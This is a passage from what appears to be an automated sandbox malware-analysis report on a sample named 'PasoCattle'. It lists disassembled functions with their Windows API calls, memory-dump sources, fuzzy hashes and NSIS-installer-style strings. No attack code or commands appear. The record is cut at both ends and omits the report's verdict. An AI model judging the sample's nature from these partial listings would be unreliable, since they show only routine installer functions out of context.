                                                                                                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                          • String ID: !
                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                          • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                          • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                                                                                          • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                          • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                          • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                          • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                          APIs
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                                                                                          • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                          • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                          • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902
                                                                                                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1599320355-0
                                                                                                                                                                          • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                          • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                          • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                          • String ID: Version
                                                                                                                                                                          • API String ID: 512980652-315105994
                                                                                                                                                                          • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                          • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                          • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                          • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                          • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
